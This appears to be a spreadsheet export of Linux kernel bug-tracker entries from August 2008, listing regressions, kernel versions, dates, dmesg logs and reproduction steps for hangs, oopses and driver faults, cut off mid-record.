    <t>Latest working kernel version: Earliest failing kernel version: 2.6.23 Distribution: Mandriva 2007.1 and 2008.0 Hardware Environment: It happens in many different servers Software Environment: Problem Description: I have close to 200 servers, most with mandriva 2006.0 using kernel 2.6.15, some with mandriva 2008.0 using kernel 2.6.23 or 2.6.25. In some of them (kernels 2.6.23 and 2.6.25 confirmed) the server hangs at random (some servers hang more than once a day, some once a month). The hardware is different from each other and i have about 5 servers with exactly the same configuration (proc, mem, ethernet, so one) and one hangs every day while the others are running fine, all with the same rules for traffic shapping (tc using htb). I think that it is something related to tc because last week i accessed a server and when i type tc del to remove the shapping it hanged. My client restarted the server and about 10 minutes later i did it again with the same effect. No kernel panic, no oops, just hangs. I've read some posts and bugs but i see something related to ethernet driver (like sk98lin), but it is happening with several servers with different hardwares. I have some servers with kernel 2.6.15 and, as far as i know, it doesn't happen with them, but some of they use a different set of tc rules (a few less rules actually) or none at all. I don't use the kernel shippied with mandriva distro, always got kernel from kernel.org and compilled myself. Steps to reproduce: Handly, since it is random, it takes minutes or weeks to happen, but always with some change in tc (start or stop).</t>
  </si>
  <si>
    <t>ext3: kernel BUG on unmounting an intentionally corrupted fs</t>
  </si>
  <si>
    <t>2.6.27-rc1 (+ patch for #10976, now in -mm)</t>
  </si>
  <si>
    <t>2008-08-05 05:21 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Minimal Debian sid (unstable) Hardware Environment: qemu x86 Software Environment: Problem Description: When the attached filesystem is unmounted after some use, a kernel BUG happens. Steps to reproduce: 1. bunzip2 the attached filesystem image 2. mount hdb.2001017 /mnt 3. cd /mnt 4. cp -R doc doc2 5. mkdir tmp 6. cd / 7. umount /mnt 8. (boom)</t>
  </si>
  <si>
    <t>BUG: scheduling while atomic: ip/23212/0x00000102</t>
  </si>
  <si>
    <t>2.6.27-rc1-git4</t>
  </si>
  <si>
    <t>2008-08-05 05:23 UTC</t>
  </si>
  <si>
    <t>2008-08-06 05:41 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: scheduling while atomic: ip/23212/0x00000102 Submitter : Arkadiusz Miskiewicz &lt;arekm@maven.pl&gt; Date : 2008-08-04 16:45 References : http://marc.info/?l=linux-kernel&amp;m=121786985700626&amp;w=4 Handled-By : Matt Carlson &lt;mcarlson@broadcom.com&gt; Patch : http://marc.info/?l=linux-netdev&amp;m=121791046925274&amp;w=2 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>umount hangs on an intentionally corrupted filesystem ("blocked for more than 120 seconds")</t>
  </si>
  <si>
    <t>2.6.27-rc1 + patch for #10976 (now in -mm)</t>
  </si>
  <si>
    <t>2008-08-05 11:08 UTC</t>
  </si>
  <si>
    <t>2012-05-22 13:11 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Minimal Debian sid (unstable) Hardware Environment: qemu x86 Software Environment: Problem Description: Unmounting the attached filesystem image after doing rm -rf to its contents blocks forever. Steps to reproduce: 1. bunzip2 the filesystem 2. mount hdb.1003449 /mnt 3. rm -rf /mnt/* 4. umount /mnt (boom)</t>
  </si>
  <si>
    <t>KVM: fix userspace ABI breakage</t>
  </si>
  <si>
    <t>2.6.26-git</t>
  </si>
  <si>
    <t>2008-08-05 15:37 UTC</t>
  </si>
  <si>
    <t>2008-08-26 05:06 UTC</t>
  </si>
  <si>
    <t>Subject : KVM: fix userspace ABI breakage Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; Date : 21 Jul 2008 17:58:26 References : http://lkml.org/lkml/2008/7/21/197 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/7/21/197</t>
  </si>
  <si>
    <t>S3: no resume, not even a beep - LG R700</t>
  </si>
  <si>
    <t>3.6-rc2</t>
  </si>
  <si>
    <t>2008-08-05 23:57 UTC</t>
  </si>
  <si>
    <t>Denys Rogovchenko</t>
  </si>
  <si>
    <t>2014-06-26 12:31 UTC</t>
  </si>
  <si>
    <t>12731 14398</t>
  </si>
  <si>
    <t>Latest working kernel version:? Earliest failing kernel version:2.6.25 Distribution: Hardware Environment:Laptop - "LG R700 U.AP55R1" Software Environment:Ubuntu Hardy 8.04 with latest updates Problem Description: groob's kernel parameters: root=/dev/sda5 ro vga=0x0369 ec_intr=0 elevator=as resume=swap:/dev/sda7 dmesg: ... ACPI: bus type pci registered [ 0.153976] PCI: MCFG configuration 0: base e0000000 segment 0 buses 0 - 255 [ 0.153976] PCI: Not using MMCONFIG. [ 0.153976] PCI: Using configuration type 1 for base access [ 0.154633] ACPI: EC: Look up EC in DSDT [ 0.161295] ACPI: Interpreter enabled [ 0.161303] ACPI: (supports S0 S1 S3 S4 S5) [ 0.161324] ACPI: Using IOAPIC for interrupt routing [ 0.161384] PCI: MCFG configuration 0: base e0000000 segment 0 buses 0 - 255 [ 0.161641] ACPI Error (evregion-0316): No handler for Region [EC__] (ffff81013fc153a8) [EmbeddedControl] [20080321] [ 0.161658] ACPI Error (exfldio-0290): Region EmbeddedControl(3) has no handler [20080321] [ 0.161672] ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff81013fc17a00), AE_NOT_EXIST [ 0.161716] ACPI Error (uteval-0233): Method execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff81013fc17a00), AE_NOT_EXIST [ 0.162909] ACPI Error (evregion-0316): No handler for Region [EC__] (ffff81013fc153a8) [EmbeddedControl] [20080321] [ 0.162926] ACPI Error (exfldio-0290): Region EmbeddedControl(3) has no handler [20080321] [ 0.162940] ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff81013fc17a00), AE_NOT_EXIST [ 0.162975] ACPI Error (uteval-0233): Method execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff81013fc17a00), AE_NOT_EXIST [ 0.162975] PCI: MCFG area at e0000000 reserved in ACPI motherboard resources [ 0.170807] PCI: Using MMCONFIG at e0000000 - efffffff [ 0.172973] ACPI: EC: non-query interrupt received, switching to interrupt mode [ 0.175973] ACPI: EC: GPE storm detected, disabling EC GPE [ 0.181004] ACPI: EC: GPE = 0x17, I/O: command/status = 0x66, data = 0x62 [ 0.181004] ACPI: EC: driver started in poll mode [ 0.181004] ACPI: PCI Root Bridge [PCI0] (0000:00) [ 0.182482] pci 0000:00:1f.0: quirk: region 0800-087f claimed by ICH6 ACPI/GPIO/TCO suspend&amp;hibernate don't work as well.... Steps to reproduce:boot kernel, dmesg | grep ACPI</t>
  </si>
  <si>
    <t>ahci.skip_host_reset is broken starting from 2.6.26</t>
  </si>
  <si>
    <t>2.6.27-rc2</t>
  </si>
  <si>
    <t>2008-08-06 05:35 UTC</t>
  </si>
  <si>
    <t>2008-08-13 18:39 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.x Earliest failing kernel version: 2.6.26 Distribution: slackware-current Hardware Environment: mobo acer ferrari 1100 amd x2 4GB RAM WD2500BEVS Software Environment: 2.6.27-rc2 Problem Description: HDD is unreacheable if it is password locked Steps to reproduce: boot the kernel</t>
  </si>
  <si>
    <t>fbcon cursor disappered after switch to 512 consolefont</t>
  </si>
  <si>
    <t>2.6.26.1</t>
  </si>
  <si>
    <t>2008-08-06 08:27 UTC</t>
  </si>
  <si>
    <t>Peter Hanzel</t>
  </si>
  <si>
    <t>2008-08-13 01:51 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.8 Earliest failing kernel version: 2.6.26 Distribution: LFS 6.3 Hardware Environment: VMWare 5.5 Software Environment: LFS, framebuffer console Problem Description: When I use setfont to change font to 512 chars font, than blinking cursor disappers. Steps to reproduce: 1) setfont LatArCyrHeb-16.psfu.gz 2) press enter (sometimes twice or more) 3) blinking cursor disappers 4) start typing (no cursor) 5) press "backspace" =&gt; cursor is back</t>
  </si>
  <si>
    <t>Regression: USB memory stick triggers several USB resets before settling with bogus capacity</t>
  </si>
  <si>
    <t>2008-08-06 13:33 UTC</t>
  </si>
  <si>
    <t>2008-08-23 12:27 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 (possibly 2.6.26) Earliest failing kernel version: 2.6.27-rc1 Distribution: Fedora 8 Hardware Environment: Software Environment: If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux srv64.palosanto.com 2.6.27-rc2 #2 PREEMPT Wed Aug 6 14:48:09 ECT 2008 i686 i686 i386 GNU/Linux Gnu C 4.1.2 Gnu make 3.81 binutils 2.17.50.0.18 util-linux 2.13.1 mount 2.13.1 module-init-tools found quota-tools 3.14. Linux C Library 2.7 Dynamic linker (ldd) 2.7 Procps 3.2.7 Kbd 1.12 oprofile 0.9.3 Sh-utils 6.9 udev 118 Modules Loaded vfat fat usb_storage fuse rfcomm l2cap bluetooth dm_mirror dm_log dm_multipath dm_mod radeon drm ipv6 sr_mod cdrom snd_pcsp snd_seq_dummy snd_hda_intel snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device 8139cp snd_pcm_oss snd_mixer_oss snd_pcm 8139too mii snd_timer snd_page_alloc snd_hwdep i2c_piix4 i2c_core pata_atiixp snd soundcore button sg pata_acpi ata_generic sata_sil libata sd_mod scsi_mod ext3 jbd mbcache uhci_hcd ohci_hcd ehci_hcd Problem Description: One particular USB flash-memory stick (identifes itself as "Corsair Voyager") that worked correctly up to 2.6.25, now triggers messages upon insertion in 2.6.27-rc1 and 2.6.27-rc2: usb 1-2: new high speed USB device using ehci_hcd and address 2 usb 1-2: configuration #1 chosen from 1 choice Initializing USB Mass Storage driver... scsi6 : SCSI emulation for USB Mass Storage devices usbcore: registered new interface driver usb-storage USB Mass Storage support registered. usb-storage: device found at 2 usb-storage: waiting for device to settle before scanning usb-storage: device scan complete scsi 6:0:0:0: Direct-Access Corsair Flash Voyager 1100 PQ: 0 ANSI: 0 CCS usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 sd 6:0:0:0: [sdb] READ CAPACITY(16) failed sd 6:0:0:0: [sdb] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK sd 6:0:0:0: [sdb] Use 0xffffffff as device size sd 6:0:0:0: [sdb] Sector size 0 reported, assuming 512. sd 6:0:0:0: [sdb] 4294967296 512-byte hardware sectors (2199023 MB) sd 6:0:0:0: [sdb] Write Protect is off sd 6:0:0:0: [sdb] Mode Sense: 43 00 00 00 sd 6:0:0:0: [sdb] Assuming drive cache: write through usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 usb 1-2: reset high speed USB device using ehci_hcd and address 2 sd 6:0:0:0: [sdb] READ CAPACITY(16) failed sd 6:0:0:0: [sdb] Result: hostbyte=DID_ERROR driverbyte=DRIVER_OK,SUGGEST_OK sd 6:0:0:0: [sdb] Use 0xffffffff as device size sd 6:0:0:0: [sdb] Sector size 0 reported, assuming 512. sd 6:0:0:0: [sdb] 4294967296 512-byte hardware sectors (2199023 MB) sd 6:0:0:0: [sdb] Write Protect is off sd 6:0:0:0: [sdb] Mode Sense: 43 00 00 00 sd 6:0:0:0: [sdb] Assuming drive cache: write through sdb: sdb1 sd 6:0:0:0: [sdb] Attached SCSI removable disk sd 6:0:0:0: Attached scsi generic sg2 type 0 SELinux: initialized (dev sdb1, type vfat), uses genfs_contexts After this, fdisk reports a bogus total capacity: Disco /dev/sdb: 2199.0 GB, 2199023255552 bytes 16 heads, 61 sectors/track, 4400581 cylinders Units = cilindros of 976 * 512 = 499712 bytes Disk identifier: 0x00000000 Disposit. Inicio Comienzo Fin Bloques Id Sistema /dev/sdb1 * 1 1014 494801+ 6 FAT16 Stick seems to work "correctly" after this - reads work correctly, have not tested writes. A Sansa Express MP3 player that exposes a USB drive does *not* trigger the bug. Steps to reproduce: Get a Corsair Voyager USB stick Plug it in (in root hub). Expected: No errors upon insertion. Reports 507 Mb as total capacity. Actual: Several ehci resets. READ_CAPACITY fails and kernel reports a bogus total capacity. [alex@srv64 usb]$ cat /proc/bus/usb/devices T: Bus=03 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=12 MxCh= 4 B: Alloc= 0/900 us ( 0%), #Int= 0, #Iso= 0 D: Ver= 1.10 Cls=09(hub ) Sub=00 Prot=00 MxPS=64 #Cfgs= 1 P: Vendor=1d6b ProdID=0001 Rev= 2.06 S: Manufacturer=Linux 2.6.27-rc2 ohci_hcd S: Product=OHCI Host Controller S: SerialNumber=0000:00:13.1 C:* #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr= 0mA I:* If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 2 Ivl=255ms T: Bus=02 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=12 MxCh= 4 B: Alloc= 0/900 us ( 0%), #Int= 0, #Iso= 0 D: Ver= 1.10 Cls=09(hub ) Sub=00 Prot=00 MxPS=64 #Cfgs= 1 P: Vendor=1d6b ProdID=0001 Rev= 2.06 S: Manufacturer=Linux 2.6.27-rc2 ohci_hcd S: Product=OHCI Host Controller S: SerialNumber=0000:00:13.0 C:* #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr= 0mA I:* If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 2 Ivl=255ms T: Bus=01 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=480 MxCh= 8 B: Alloc= 0/800 us ( 0%), #Int= 0, #Iso= 0 D: Ver= 2.00 Cls=09(hub ) Sub=00 Prot=00 MxPS=64 #Cfgs= 1 P: Vendor=1d6b ProdID=0002 Rev= 2.06 S: Manufacturer=Linux 2.6.27-rc2 ehci_hcd S: Product=EHCI Host Controller S: SerialNumber=0000:00:13.2 C:* #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr= 0mA I:* If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 4 Ivl=256ms T: Bus=01 Lev=01 Prnt=01 Port=01 Cnt=01 Dev#= 4 Spd=480 MxCh= 0 D: Ver= 2.00 Cls=00(&gt;ifc ) Sub=00 Prot=00 MxPS=64 #Cfgs= 1 P: Vendor=090c ProdID=1000 Rev=11.00 S: Manufacturer=Corsair S: Product=Flash Voyager S: SerialNumber=A100000000000604 C:* #Ifs= 1 Cfg#= 1 Atr=80 MxPwr=100mA I:* If#= 0 Alt= 0 #EPs= 2 Cls=08(stor.) Sub=06 Prot=50 Driver=usb-storage E: Ad=81(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms E: Ad=02(O) Atr=02(Bulk) MxPS= 512 Ivl=31875us</t>
  </si>
  <si>
    <t>Re: 2.6.27-rc2: uvcvideo WARNING after suspend to ram</t>
  </si>
  <si>
    <t>2008-08-07 04:02 UTC</t>
  </si>
  <si>
    <t>2008-08-22 15:27 UTC</t>
  </si>
  <si>
    <t>Invalid op opcode in kernel/workqueue</t>
  </si>
  <si>
    <t>2008-08-07 04:18 UTC</t>
  </si>
  <si>
    <t>2008-11-16 10:05 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: nver seen this bug before Earliest failing kernel version: 2.6.27-rc2 Distribution: Debian Sid Hardware Environment: athlon64 x2 4200 Software Environment: X86_64 Problem Description: Message from syslog Steps to reproduce: dunno. This was during high load (compiling the latest 2.6.27-rc2-git1 kernel). There was no task failure as far as I can see. I got : Aug 7 13:04:57 tangerine kernel: kernel BUG at kernel/workqueue.c:240! Aug 7 13:04:57 tangerine kernel: invalid opcode: 0000 [1] PREEMPT SMP Aug 7 13:04:57 tangerine kernel: CPU 0 I will attach the whole syslog trace. Regards Jean-Luc</t>
  </si>
  <si>
    <t>sched: revert cpu_clock to pre-27ec4407790d075c325e1f4da0a19c56953cce23 state</t>
  </si>
  <si>
    <t>commit 27ec4407790d075c325e1f4da0a19c56953cce23</t>
  </si>
  <si>
    <t>2008-08-07 12:40 UTC</t>
  </si>
  <si>
    <t>2008-08-12 11:12 UTC</t>
  </si>
  <si>
    <t>Subject : [BISECTION RESULT] sched: revert cpu_clock to pre-27ec4407790d075c325e1f4da0a19c56953cce23 state Submitter : Nishanth Aravamudan &lt;nacc@us.ibm.com&gt; Date : 2008-08-04 19:46 References : http://marc.info/?l=linux-kernel&amp;m=121787924917646&amp;w=4 Handled-By : Peter Zijlstra &lt;peterz@infradead.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121792660313276&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc1: softcursor behaviour changed</t>
  </si>
  <si>
    <t>2008-08-07 13:01 UTC</t>
  </si>
  <si>
    <t>2008-08-11 13:37 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc1: softcursor behaviour changed Submitter : Pavel Machek &lt;pavel@suse.cz&gt; Date : 2008-08-05 21:20 References : http://marc.info/?l=linux-kernel&amp;m=121797130829383&amp;w=4 Handled-By : Stefano Stabellini &lt;stefano.stabellini@eu.citrix.com&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops when accessing /proc/lockdep_chains</t>
  </si>
  <si>
    <t>2008-08-07 13:09 UTC</t>
  </si>
  <si>
    <t>2008-08-12 11:14 UTC</t>
  </si>
  <si>
    <t>Subject : Oops when accessing /proc/lockdep_chains Submitter : Eric Sesterhenn &lt;snakebyte@gmx.de&gt; Date : 2008-08-06 12:16 References : http://marc.info/?l=linux-kernel&amp;m=121802509626294&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BUG] hugetlb: sleeping function called from invalid context</t>
  </si>
  <si>
    <t>2008-08-07 13:15 UTC</t>
  </si>
  <si>
    <t>2008-08-16 12:56 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] hugetlb: sleeping function called from invalid context Submitter : Gerald Schaefer &lt;gerald.schaefer@de.ibm.com&gt; Date : 2008-08-06 14:43 References : http://marc.info/?l=linux-mm&amp;m=121803401427843&amp;w=4 Handled-By : Andy Whitcroft &lt;apw@shadowen.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121804949526359&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>build error: CONFIG_OPTIMIZE_INLINING=y causes gcc 4.2 to do stupid things</t>
  </si>
  <si>
    <t>2008-08-07 13:33 UTC</t>
  </si>
  <si>
    <t>2008-09-16 22:07 UTC</t>
  </si>
  <si>
    <t>Subject : build issue #549 for v2.6.27-rc2 :ixj.c:(.text+0x172b89): undefined reference to `pnp_get_resource' Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-08-06 17:18 References : http://marc.info/?l=linux-kernel&amp;m=121804329014332&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG kmalloc-64: Object already free</t>
  </si>
  <si>
    <t>2.6.27-rc1-00156-g94ad374</t>
  </si>
  <si>
    <t>2008-08-07 13:50 UTC</t>
  </si>
  <si>
    <t>2008-08-14 06:06 UTC</t>
  </si>
  <si>
    <t>Subject : BUG kmalloc-64: Object already free Submitter : "Justin Mattock" &lt;justinmattock@gmail.com&gt; Date : 2008-08-06 21:21 References : http://marc.info/?l=linux-kernel&amp;m=121805862910241&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc2: Very odd top: '5124095h kthreadd' display</t>
  </si>
  <si>
    <t>2008-08-07 13:54 UTC</t>
  </si>
  <si>
    <t>2008-08-17 05:18 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc2: Very odd top: '5124095h kthreadd' display Submitter : Grant Coady &lt;grant_lkml@dodo.com.au&gt; Date : 2008-08-07 7:03 References : http://marc.info/?l=linux-kernel&amp;m=121809267318795&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Fix broken VMI in 2.6.27-rc..</t>
  </si>
  <si>
    <t>2.6.27-rc</t>
  </si>
  <si>
    <t>2008-08-07 14:04 UTC</t>
  </si>
  <si>
    <t>2008-08-12 11:16 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH]Fix broken VMI in 2.6.27-rc.. Submitter : Alok Kataria &lt;akataria@vmware.com&gt; Date : 2008-08-07 19:12 References : http://marc.info/?l=linux-kernel&amp;m=121813641028838&amp;w=4 Handled-By : Alok Kataria &lt;akataria@vmware.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121813641028838&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc1: critical thermal shutdown on thinkpad x60</t>
  </si>
  <si>
    <t>2008-08-07 14:10 UTC</t>
  </si>
  <si>
    <t>2008-08-15 11:28 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc1: critical thermal shutdown on thinkpad x60 Submitter : Pavel Machek &lt;pavel@suse.cz&gt; Date : 2008-08-06 9:02 References : http://marc.info/?l=linux-kernel&amp;m=121802744007517&amp;w=4 Handled-By : Andi Kleen &lt;andi@firstfloor.org&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Please fix x86 defconfig regression</t>
  </si>
  <si>
    <t>2008-08-07 14:13 UTC</t>
  </si>
  <si>
    <t>2008-08-28 14:21 UTC</t>
  </si>
  <si>
    <t>Subject : Please fix x86 defconfig regression Submitter : Andi Kleen &lt;andi@firstfloor.org&gt; Date : 2008-08-07 20:46 References : http://marc.info/?l=linux-kernel&amp;m=121814188805666&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>possible recursive locking in udp4_lib_rcv</t>
  </si>
  <si>
    <t>2008-08-08 13:46 UTC</t>
  </si>
  <si>
    <t>2008-08-14 01:11 UTC</t>
  </si>
  <si>
    <t>Subject : possible recursive locking in udp4_lib_rcv Submitter : "Michael S. Tsirkin" &lt;m.s.tsirkin@gmail.com&gt; Date : 2008-08-07 23:46 References : http://marc.info/?l=linux-kernel&amp;m=121815284623084&amp;w=4 Handled-By : Herbert Xu &lt;herbert@gondor.apana.org.au&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121820774505110&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression in 2.6.27-rc1 for set_cpus_allowed_ptr</t>
  </si>
  <si>
    <t>2008-08-08 13:57 UTC</t>
  </si>
  <si>
    <t>2008-08-12 11:18 UTC</t>
  </si>
  <si>
    <t>Subject : Regression in 2.6.27-rc1 for set_cpus_allowed_ptr Submitter : "Langsdorf, Mark" &lt;mark.langsdorf@amd.com&gt; Date : 2008-08-08 19:44 References : http://marc.info/?l=linux-kernel&amp;m=121822469903539&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26.2</t>
  </si>
  <si>
    <t>2.6.27-rc2: MSI vs. ath5k suspend regression on EeePC</t>
  </si>
  <si>
    <t>2008-08-09 14:44 UTC</t>
  </si>
  <si>
    <t>2008-08-20 12:14 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc2: suspend regression on EeePC Submitter : Alan Jenkins &lt;alan-jenkins@tuffmail.co.uk&gt; Date : 2008-08-06 18:59 References : http://thread.gmane.org/gmane.linux.kernel.kernel-testers/701 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>watchdog/iTCO_vendor_support.c build error</t>
  </si>
  <si>
    <t>2.6.27-rc2-325-g796aade</t>
  </si>
  <si>
    <t>2008-08-09 14:55 UTC</t>
  </si>
  <si>
    <t>2008-08-12 04:40 UTC</t>
  </si>
  <si>
    <t>drivers_watchdog@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Subject : build issue #552 for v2.6.27-rc2-325-g796aade :drivers/watchdog/pcwd.c : incompatible pointer type Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-08-09 19:54 References : http://marc.info/?l=linux-kernel&amp;m=121831173604972&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc2-git4: suspend and power off fails on Asus M3A32-MVP</t>
  </si>
  <si>
    <t>2.6.27-rc2-git4</t>
  </si>
  <si>
    <t>2008-08-09 15:03 UTC</t>
  </si>
  <si>
    <t>2008-08-22 11:21 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc2-git4: suspend and power off fails on Asus M3A32-MVP Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2008-08-09 21:21 References : http://marc.info/?l=linux-kernel&amp;m=121831675111794&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>OOPS in rt6_fill_node</t>
  </si>
  <si>
    <t>2008-08-09 17:26 UTC</t>
  </si>
  <si>
    <t>2008-08-11 18:05 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26-rc4 Earliest failing kernel version: 2.6.26 Distribution: NA Hardware Environment: x86 Software Environment: ip Problem Description: $ ip -f inet6 route get fec0::1 Produces this oops - BUG: unable to handle kernel NULL pointer dereference at 00000000 IP: [&lt;c0369b85&gt;] rt6_fill_node+0x175/0x3b0 *pdpt = 0000000036466001 *pde = 0000000000000000 Oops: 0000 [#1] SMP Modules linked in: pcnet32 smsc47m192 i2c_i801 i2c_dev i2c_core r8169 coretemp i t87 hwmon_vid lcm e1000e Pid: 3033, comm: ip Not tainted (2.6.26.2 #1) EIP: 0060:[&lt;c0369b85&gt;] EFLAGS: 00010246 CPU: 1 EIP is at rt6_fill_node+0x175/0x3b0 EAX: 00000000 EBX: f7115bbc ECX: 00000000 EDX: f7115c60 ESI: f7c1f100 EDI: f7548f00 EBP: f7115bdc ESP: f7115ba4 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process ip (pid: 3033, ti=f7114000 task=f64cbc50 task.ti=f7114000) Stack: f7115bbc 00000000 f7115c54 f7115bc0 f7115c60 f6d75078 00000000 f7115bdc c036a5f0 c036b360 00000000 f75487a0 00000000 f7548f00 f7115c9c c036c30e f7115c70 00000000 00000018 00000bd9 489b2024 00000000 00000000 00000000 Call Trace: [&lt;c036a5f0&gt;] ? ip6_route_output+0x50/0xa0 [&lt;c036b360&gt;] ? ip6_pol_route_output+0x0/0x20 [&lt;c036c30e&gt;] ? inet6_rtm_getroute+0x16e/0x200 [&lt;c036c1a0&gt;] ? inet6_rtm_getroute+0x0/0x200 [&lt;c030ef19&gt;] ? rtnetlink_rcv_msg+0x1b9/0x1f0 [&lt;c030ed60&gt;] ? rtnetlink_rcv_msg+0x0/0x1f0 [&lt;c031426d&gt;] ? netlink_rcv_skb+0x8d/0xb0 [&lt;c030ed57&gt;] ? rtnetlink_rcv+0x17/0x20 [&lt;c031402d&gt;] ? netlink_unicast+0x23d/0x270 [&lt;c030162a&gt;] ? memcpy_fromiovec+0x4a/0x70 [&lt;c0314811&gt;] ? netlink_sendmsg+0x1c1/0x290 [&lt;c02fa165&gt;] 